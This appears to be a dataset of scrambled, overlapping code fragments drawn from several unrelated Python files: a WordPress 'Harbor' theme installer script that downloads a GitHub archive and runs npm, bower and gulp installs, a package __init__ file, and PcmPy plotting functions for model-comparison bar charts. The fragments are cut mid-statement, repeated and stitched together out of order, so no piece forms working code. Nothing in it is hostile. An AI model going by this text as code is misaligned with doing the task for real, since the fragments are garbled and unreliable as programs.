"files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def",
"\"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = []",
"setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for",
"def setupTheme(): name = input(\"Enter a name for the theme: \") slug =",
"problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content:",
"theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme",
"input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] !=",
"Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\",",
"and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans",
"python3 setup.py'\") return #download theme zip if fetchArchive() == False: return 1 print(\"Setting",
"files): for filename in files: file = open(filename, \"r\") filedata = file.read() file.close()",
"open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\")",
"heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" +",
"requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem while downloading the",
"3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import requests import",
"import glob import subprocess import platform import sys, getopt import argparse import re",
"/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3",
"Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode ==",
"subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not",
"!= 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return",
"desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!')",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if",
"import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update',",
"current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme",
"filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd",
"module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n':",
"headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name:",
"while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans",
"coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME>",
"\"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm",
"updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme",
"os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if",
"', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description",
"glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\",",
"slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings,",
"print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans",
"strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\"))",
"[] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\",",
"directory\") plat = platform.system() results = parser.parse_args() install = results.install update = results.update",
"fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif",
"+ slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" +",
"'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") #",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug)",
"the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass",
"filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\"",
"print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory):",
"to install Harbor theme to or if -u option is present updates the",
"@author: <NAME> \"\"\" import zipfile import os import requests import glob import subprocess",
"Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import",
"root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False:",
"ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\")",
"subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\",",
"installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\")",
"for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata)",
"argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False,",
"return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir",
"re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in",
"if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3",
"dest='dir', help=\"Specify a directory to install Harbor theme to or if -u option",
"help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install",
"print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+",
"input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\", end=' ')",
"in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" +",
"slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" +",
"in that directory\") plat = platform.system() results = parser.parse_args() install = results.install update",
"getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true',",
"> updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0)",
"False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if",
"'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\",",
"print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True,",
"slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain:",
"in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def",
"is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please",
"file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\")",
"Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme",
"for the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ',",
"Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \"",
"slug def findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata",
"print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing",
"-g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm",
"action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or if -u",
"not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run",
"\") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the starter theme",
"0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download",
"'--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store',",
"print(\"\") print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive(): try:",
"== False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update:",
"as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file:",
"the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current",
"downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\")",
"Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\")",
"'--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or if",
"return #download theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\")",
"breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results",
"print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name for the theme:",
"print('Done!') return slug def findInFiles(strings, files): for filename in files: file = open(filename,",
"harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to",
"file.status_code != 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \")",
"is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\")",
"as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() ==",
"+ slug + \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename)",
"for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug)",
"print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads",
"if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if",
"the Harbor based theme in that directory\") plat = platform.system() results = parser.parse_args()",
"a short description for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\",",
"FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code !=",
"setup by Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description:",
"not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp",
"utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\"",
"in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line)",
"filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\"",
"+ name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup by",
"name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive():",
"\") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\"",
"npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower",
"gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp",
"= name.lower().replace(' ', '_') desc = input(\"Enter a short description for the theme:",
"def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates",
"a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as",
"help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory",
"is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to",
"sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the starter",
"== 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g",
"was a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\")",
"print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1:",
"\"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" +",
"import os import requests import glob import subprocess import platform import sys, getopt",
"\"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in",
"zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter",
"if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug)",
"= \"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\",",
"\"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \"",
"None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this",
"1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE,",
"= nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] !=",
"pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200:",
"if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid()",
"print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE,",
"return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ')",
"name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the",
"= parser.parse_args() install = results.install update = results.update setup_dir = results.dir if(install): if",
"to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\")",
"Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError:",
"theme in that directory\") plat = platform.system() results = parser.parse_args() install = results.install",
"re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as",
"change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close()",
"bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \"",
"gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\",",
"def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm =",
"+ slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def",
"slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a",
"#exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results = update_avail.findall(line)",
"files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme",
"ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans =",
"\"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" +",
"platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script as root\")",
"theme to or if -u option is present updates the Harbor based theme",
"elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to",
"in files: file = open(filename, \"r\") filedata = file.read() file.close() for change in",
"funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\"))",
"nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for",
"subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ == \"__main__\"): main()",
"os import requests import glob import subprocess import platform import sys, getopt import",
"setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() !=",
"results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update",
"') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name",
"file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\"",
"Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir)",
"import subprocess import platform import sys, getopt import argparse import re def main():",
"'_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text",
"+ slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in",
"1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is",
"results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system()",
"plat = platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir",
"return slug def findInFiles(strings, files): for filename in files: file = open(filename, \"r\")",
"There was a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\",",
"parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory',",
"a name for the theme: \") slug = name.lower().replace(' ', '-') funcSlug =",
"if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+",
"development environment setup by Infinity Marketing that is heavily based on Automattic's Underscores",
"that directory\") plat = platform.system() results = parser.parse_args() install = results.install update =",
"print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return",
"else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail =",
"slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace('",
"that is heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo,",
"200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return False",
"files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\",",
"install = results.install update = results.update setup_dir = results.dir if(install): if setup_dir is",
"print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme"
] |
[
"from __future__ import unicode_literals from .cmdline import main from .version import __version__ main",
"<filename>green/__init__.py from __future__ import unicode_literals from .cmdline import main from .version import __version__",
"__future__ import unicode_literals from .cmdline import main from .version import __version__ main __version__"
] |
[
"\"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with the results",
"if type(null_model) != str: null_model = m_names[null_model] if noise_ceiling is not None: if",
"= np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else:",
"l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l) ax.set_ylabel('Log Bayes Factor') return ax",
"is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0,",
"Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with the results (from",
"m_names = likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model] if noise_ceiling is",
"= likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model] if noise_ceiling is not",
"Stretch out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax",
"-*- \"\"\" Functions for visualization of PCM models, Data, and model fits @author:",
"coding: utf-8 -*- \"\"\" Functions for visualization of PCM models, Data, and model",
"<filename>PcmPy/vis.py<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Functions for visualization of",
"LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not",
"likelihood (pd.DataFrame) Data Frame with the results (from T.likelihood) null_model (int or string)",
"= np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if",
"import numpy as np import matplotlib.pyplot as plt import matplotlib.patches as patches import",
"axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if",
"= ax.get_xlim() if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is",
"is not None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract the",
"as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot",
"series) Likelihood for the upper noise ceiling (usuallu from group fit) Returns: ax",
"type(null_model) != str: null_model = m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling)",
"patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]],",
"matplotlib.patches as patches import matplotlib.lines as mlines import seaborn as sb import pandas",
"fits @author: jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot as plt import",
"or string) Number or name of the model that define the zero-point noise_ceiling(int",
"np import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.lines as mlines",
"(from T.likelihood) null_model (int or string) Number or name of the model that",
"the zero-point noise_ceiling(int or string) Number or name of the model that defines",
"ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names",
"import matplotlib.lines as mlines import seaborn as sb import pandas as pd def",
"!=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not None:",
"models, Data, and model fits @author: jdiedrichsen \"\"\" import numpy as np import",
"as mlines import seaborn as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\"",
"zero-point noise_ceiling(int or string) Number or name of the model that defines the",
"or name of the model that define the zero-point noise_ceiling(int or string) Number",
"upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower,",
"visualization of PCM models, Data, and model fits @author: jdiedrichsen \"\"\" import numpy",
"as plt import matplotlib.patches as patches import matplotlib.lines as mlines import seaborn as",
"likelihood = likelihood - baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood) indx",
"noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l =",
"or name of the model that defines the noise ceiling upper_ceiling (np.array or",
"noise_ceiling is not None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract",
"of PCM models, Data, and model fits @author: jdiedrichsen \"\"\" import numpy as",
"str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood =",
"= likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch out the data frame",
"or series) Likelihood for the upper noise ceiling (usuallu from group fit) Returns:",
"noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower,",
"define the zero-point noise_ceiling(int or string) Number or name of the model that",
"0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model]",
"defines the noise ceiling upper_ceiling (np.array or series) Likelihood for the upper noise",
"# Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) #",
"indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim()",
"Frame with the results (from T.likelihood) null_model (int or string) Number or name",
"Parameters: likelihood (pd.DataFrame) Data Frame with the results (from T.likelihood) null_model (int or",
"results (from T.likelihood) null_model (int or string) Number or name of the model",
"PCM models, Data, and model fits @author: jdiedrichsen \"\"\" import numpy as np",
"as np import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.lines as",
"model fits @author: jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot as plt",
"that define the zero-point noise_ceiling(int or string) Number or name of the model",
"import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.lines as mlines import",
"Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch",
"ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not None: noise_lower",
"frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim",
"noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model) != str:",
"Data Frame with the results (from T.likelihood) null_model (int or string) Number or",
"# Stretch out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling)",
"0.2] m_names = likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model] if noise_ceiling",
"Data, and model fits @author: jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot",
"type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values",
"0.5, 0.2] m_names = likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model] if",
"(usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col =",
"= patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0],",
"that defines the noise ceiling upper_ceiling (np.array or series) Likelihood for the upper",
"for the upper noise ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib",
"likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood)",
"likelihood - baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model",
